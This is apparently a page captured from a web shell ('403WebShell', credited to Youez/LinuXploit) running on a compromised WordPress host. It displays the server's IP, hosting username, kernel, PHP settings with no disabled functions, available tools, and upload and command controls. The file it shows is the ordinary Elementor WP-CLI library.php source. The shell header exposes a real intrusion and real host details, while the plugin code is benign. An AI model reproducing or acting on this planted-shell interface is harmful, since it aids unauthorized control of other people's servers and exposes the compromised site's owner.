Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.216.32.251
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/wavestudioz.com/wp-content/plugins/elementor/modules/wp-cli/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/wavestudioz.com/wp-content/plugins/elementor/modules/wp-cli/library.php
<?php
namespace Elementor\Modules\WpCli;

use Elementor\Api;
use Elementor\Plugin;
use Elementor\TemplateLibrary\Source_Local;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

/**
 * Elementor Page Builder cli tools.
 */
class Library extends \WP_CLI_Command {

	/**
	 * Sync Elementor Library.
	 *
	 * [--network]
	 *      Sync library in all the sites in the network.
	 *
	 * [--force]
	 *      Force sync even if it's looks like that the library is already up to date.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor library sync
	 *      - This will sync the library with Elementor cloud library.
	 *
	 *  2. wp elementor library sync --force
	 *      - This will sync the library with Elementor cloud even if it's looks like that the library is already up to date.
	 *
	 *  3. wp elementor library sync --network
	 *      - This will sync the library with Elementor cloud library for each site in the network if needed.
	 *
	 * @since 2.8.0
	 * @access public
	 */
	public function sync( $args, $assoc_args ) {
		$network = isset( $assoc_args['network'] ) && is_multisite();

		if ( $network ) {
			$blog_ids = get_sites( [
				'fields' => 'ids',
				'number' => 0,
			] );

			foreach ( $blog_ids as $blog_id ) {
				switch_to_blog( $blog_id );

				\WP_CLI::line( 'Site #' . $blog_id . ' - ' . get_option( 'blogname' ) );

				$this->do_sync( isset( $assoc_args['force'] ) );

				\WP_CLI::success( 'Done! - ' . get_option( 'home' ) );

				restore_current_blog();
			}
		} else {
			$this->do_sync( isset( $assoc_args['force'] ) );
			\WP_CLI::success( 'Done!' );
		}
	}

	/**
	 * Import template files to the Library.
	 *
	 *  [--returnType]
	 *      Forms of output. Possible values are 'ids', 'info'.
	 *      if this parameter won't be specified, the import info will be output.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor library import <file-path>
	 *      - This will import a file or a zip of multiple files to the library.
	 *      - file-path can be a path or url.
	 *
	 *  2. wp elementor library import <file-path> --returnType=info,ids
	 *
	 * @param $args
	 * @param $assoc_args
	 *
	 * @since  2.8.0
	 * @access public
	 */
	public function import( $args, $assoc_args ) {
		if ( empty( $args[0] ) ) {
			\WP_CLI::error( 'Please set file path.' );
		}

		$file = $args[0];
		$imported_items_ids = [];
		$return_type = \WP_CLI\Utils\get_flag_value( $assoc_args, 'returnType', 'info' );

		/** @var Source_Local $source */
		$source = Plugin::$instance->templates_manager->get_source( 'local' );

		if ( filter_var( $file, FILTER_VALIDATE_URL ) ) {
			$tmp_path = download_url( $file );
			if ( is_wp_error( $tmp_path ) ) {
				\WP_CLI::error( $tmp_path->get_error_message() );
			}
			$file = $tmp_path;
		}

		$imported_items = $source->import_template( basename( $file ), $file );

		if ( is_wp_error( $imported_items ) ) {
			\WP_CLI::error( $imported_items->get_error_message() );
		}

		foreach ( $imported_items as $item ) {
			$imported_items_ids[] = $item['template_id'];
		}
		$imported_items_ids = implode( ',', $imported_items_ids );

		if ( 'ids' === $return_type ) {
			\WP_CLI::line( $imported_items_ids );
		} else {
			\WP_CLI::success( count( $imported_items ) . ' item(s) has been imported.' );
		}

		if ( isset( $tmp_path ) ) {
			// Remove the temporary file, now that we're done with it.
			Plugin::$instance->uploads_manager->remove_file_or_dir( $file );
		}
	}

	/**
	 * Import all template files from a directory.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor library import-dir <file-path>
	 *      - This will import all JSON files from <file-path>
	 *
	 * @param $args
	 *
	 * @since  3.4.7
	 * @access public
	 * @alias import-dir
	 */
	public function import_dir( $args ) {
		if ( empty( $args[0] ) ) {
			\WP_CLI::error( 'Please set dir path.' );
		}

		$dir = $args[0];

		if ( ! file_exists( $dir ) ) {
			\WP_CLI::error( "Dir `{$dir}` not found." );
		}

		$files = glob( $dir . '/*.json' );

		if ( empty( $files ) ) {
			\WP_CLI::error( 'Files not found.' );
		}

		/** @var Source_Local $source */
		$source = Plugin::$instance->templates_manager->get_source( 'local' );

		$succeed = [];
		$errors = [];

		foreach ( $files as $file ) {
			$basename = basename( $file );

			if ( ! file_exists( $file ) ) {
				$errors[ $basename ] = $file . ' file not found.';
				continue;
			}

			$imported_items = $source->import_template( $basename, $file );

			if ( is_wp_error( $imported_items ) ) {
				$errors[ $basename ] = $imported_items->get_error_message();
			} else {
				$succeed[ $basename ] = true;
			}
		}

		$succeed_message = count( $succeed ) . ' item(s) has been imported.';

		if ( ! empty( $errors ) ) {
			$error_message = var_export( $errors, 1 );
			if ( ! empty( $succeed ) ) {
				$error_message = $succeed_message . ' ' . count( $errors ) . ' has errors: ' . $error_message;
			}
			\WP_CLI::error( $error_message );
		}

		\WP_CLI::success( $succeed_message );
	}

	/**
	 * Connect site to Elementor Library.
	 * (Network is not supported)
	 *
	 * --user
	 *      The user to connect <id|login|email>
	 *
	 * --token
	 *      A connect token from Elementor Account Dashboard.
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor library connect --user=admin --token=<connect-cli-token>
	 *      - This will connect the admin to Elementor library.
	 *
	 * @param $args
	 * @param $assoc_args
	 *
	 * @since  2.8.0
	 * @access public
	 */
	public function connect( $args, $assoc_args ) {
		if ( ! get_current_user_id() ) {
			\WP_CLI::error( 'Please set user to connect (--user=<id|login|email>).' );
		}

		if ( empty( $assoc_args['token'] ) ) {
			\WP_CLI::error( 'Please set connect token.' );
		}

		$_REQUEST['mode'] = 'cli';
		$_REQUEST['token'] = $assoc_args['token'];

		$app = $this->get_library_app();

		$app->set_auth_mode( 'cli' );

		$app->action_authorize();

		$app->action_get_token();
	}

	/**
	 * Disconnect site from Elementor Library.
	 *
	 * --user
	 *      The user to disconnect <id|login|email>
	 *
	 * ## EXAMPLES
	 *
	 *  1. wp elementor library disconnect --user=admin
	 *      - This will disconnect the admin from Elementor library.
	 *
	 * @param $args
	 * @param $assoc_args
	 *
	 * @since  2.8.0
	 * @access public
	 */
	public function disconnect() {
		if ( ! get_current_user_id() ) {
			\WP_CLI::error( 'Please set user to connect (--user=<id|login|email>).' );
		}

		$_REQUEST['mode'] = 'cli';

		$this->get_library_app()->action_disconnect();
	}

	private function do_sync() {
		$data = Api::get_library_data( true );

		if ( empty( $data ) ) {
			\WP_CLI::error( 'Cannot sync library.' );
		}
	}

	/**
	 * @return \Elementor\Core\Common\Modules\Connect\Apps\Library
	 */
	private function get_library_app() {
		$connect = Plugin::$instance->common->get_component( 'connect' );
		$app = $connect->get_app( 'library' );
		// Before init.
		if ( ! $app ) {
			$connect->init();
			$app = $connect->get_app( 'library' );
		}

		return $app;
	}
}

Youez - 2016 - github.com/yon3zu
LinuXploit